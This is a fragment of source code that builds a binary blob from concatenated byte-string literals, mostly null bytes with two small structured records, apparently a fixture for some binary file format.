"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x54\x76\xF8\x4E\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xF5\xF5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFC\x9A\x15\xD2\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\xF5\xF4\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA8\xEC\xED\x9C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0C\x1C\xE0\x75\x19\xCB\xF5\xA2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x65\x65\xBC\xC2\xD9\xE6\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\xF4\x52\xA1\xD1\x08\xCD\x5D\x4E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x90\x48\xC1\xD8\x12". + "\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE7\xD8\x48\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xF7\xF5". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x34\x75\xD8\x3D\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\xF5\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD3\xAD\x90\xDD". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x9E\x3E". + "\x43\xF9\x38\xAC\xE5\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xCA\x65\x65\xC2\xAF\xE6\x00\x43\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD6\xDE\x7C\x1C\x9C\x04\x36\xC6\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3D\x90\x90\xC1\xAD\x12\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x03\x01". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
